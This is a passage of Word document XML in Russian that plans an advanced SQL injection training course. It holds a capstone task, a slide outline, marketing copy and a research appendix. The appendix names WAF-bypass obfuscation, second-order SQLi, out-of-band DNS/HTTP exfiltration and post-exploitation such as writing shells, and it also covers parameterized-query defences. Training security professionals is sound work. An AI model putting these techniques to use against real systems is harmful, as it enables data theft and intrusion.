        <w:t>Студенту предоставляется доступ к веб-приложению, защищенному WAF, с реализованной логикой личных кабинетов. Необходимо обнаружить вектор Second-Order SQLi, обойти фильтрацию и извлечь данные администратора через OOB-канал, после чего подготовить патч для исходного кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Успешный обход сигнатурного анализа WAF без использования sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Демонстрация извлечения данных через DNS или HTTP слушатель</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Доказательство эксплуатации уязвимости второго порядка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Предоставление исправленного кода с использованием параметризованных запросов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Обоснование выбора техник обфускации в отчете</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>ТЗ для презентации курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стиль: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Строгий минимализм в темных тонах с акцентами на фрагментах кода и схемах потоков данных</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>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Заголовок слайда</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5953"/>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Содержание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SQL-инъекции продвинутого уровня</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Название курса; Целевая аудитория; Ключевые компетенции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Проблематика современных WAF</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Принципы работы сигнатурного анализа; Почему стандартные нагрузки не работают; Ограничения автоматизации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Техники обфускации: Кодировки</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Double URL encoding; Hex-представление; Использование комментариев внутри ключевых слов</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HTTP Parameter Pollution</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Механика разделения нагрузки; Различия в обработке параметров разными веб-серверами; Примеры payload</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Альтернативные функции СУБД</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Замена пробелов; Эквиваленты функции SLEEP(); Обход фильтрации кавычек</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6</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Механика Second-Order SQLi</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Этап 1: Внедрение и сохранение; Этап 2: Вызов и исполнение; Точки входа в бизнес-логике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7</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Поиск векторов второго порядка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Анализ функций обновления профиля; Работа с корзиной и настройками; Прослеживание пути данных в БД</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8</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Out-of-band (OOB) концепция</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Когда Blind SQLi невозможна; Преимущества внешних каналов; Требования к инфраструктуре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9</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Эксфильтрация через DNS</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Использование поддоменов для передачи данных; Функции load_file и аналоги в разных СУБД</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10</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Эксфильтрация через HTTP</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Инициирование запросов из БД; Настройка слушателя; Обработка полученных логов</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Аудит кода: PHP и Python</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Поиск опасных функций; Анализ конкатенации строк; Типичные ошибки разработчиков</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Безопасная архитектура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Prepared Statements и их ограничения; Валидация по белому списку; Ролевая модель доступа в БД</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Defense in Depth</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Эшелонированная защита; Настройка WAF; Мониторинг аномальных запросов к БД</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Практический кейс</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Разбор реальной атаки на корпоративный сектор; Цепочка действий атакующего; Ошибки защиты</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Заключение и итоги</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Резюме навыков; Рекомендации по дальнейшему развитию; Контакты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Маркетинг и упаковка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Лендинг-заголовок: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Станьте экспертом, способным обойти любую защиту: ручная эксплуатация SQLi там, где бессильны сканеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Полный отказ от sqlmap в пользу глубокого понимания синтаксиса СУБД</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Уникальные методики обхода современных Web Application Firewalls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Практика реализации скрытых атак второго порядка и Out-of-band эксфильтрации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Фокус на сложных сценариях, актуальных для Middle и Senior специалистов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SEO ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL injection, WAF bypass, Second-Order SQLi, Out-of-band SQLi, AppSec, пентест, безопасность баз данных, эксплуатация уязвимостей, аудит кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Приложение: ресёрч темы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Исследовательская часть, на которую опирался ИИ при создании курса. Полезно для методолога и для отстройки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Аналитический отчет: Проектирование курса «SQL-инъекции: Продвинутый уровень»</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Ландшафт темы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>На рынке ИБ-образования (Pentest Academy, PortSwigger Academy, Offensive Security, Stepik, Coursera) тема представлена в трех форматах:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Обзорный (Junior):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi как один из пунктов OWASP Top 10. Поверхностный разбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Академический:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Глубокая теория баз данных, но слабая связь с реальными векторами атак.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CTF-ориентированный:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Решение специфических головоломок, которые редко встречаются в промышленном коде.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Глубина:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Большинство курсов останавливаются на классических Union-based атаках. Темы обхода WAF и автоматизации раскрыты фрагментарно.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. «База» — что ОБЯЗАНО быть в курсе</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Механика взаимодействия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разбор протокола обмена данными между приложением и СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Классификация:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In-band (Union, Error-based), Inferential (Blind, Time-based), Out-of-band (OOB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fingerprinting:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Определение типа и версии СУБД (MySQL, PostgreSQL, MSSQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Data Extraction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Техники извлечения схемы данных, таблиц и записей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Безопасная разработка (SDLC):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prepared Statements, ORM, параметризация как единственный верный метод защиты.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. УТП — точки отстройки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Фокус на Second-Order SQLi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обучение поиску уязвимостей, где полезная нагрузка сохраняется в БД и срабатывает при последующем вызове (редкая и опасная тема).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WAF Bypassing Masterclass:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не просто теория, а воркшоп по обфускации запросов (использование кодировок, специфических функций СУБД, HTTP Parameter Pollution).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Post-Exploitation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Что делать после получения доступа? Чтение файлов (LFI через SQL), запись шеллов, повышение привилегий внутри СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Анализ исходного кода (SAST):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обучение студента видеть уязвимый паттерн в коде (PHP, Python, Java), а не только «стучаться в закрытую дверь» снаружи.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Целевая аудитория</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Пентестеры (Middle):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хотят систематизировать знания, уйти от использования только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к ручному анализу сложных случаев.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Backend-разработчики (Senior):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хотят понимать природу атак для проектирования архитектуры и проведения качественного Code Review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AppSec-инженеры:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Нуждаются в методологии верификации багов, найденных сканерами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
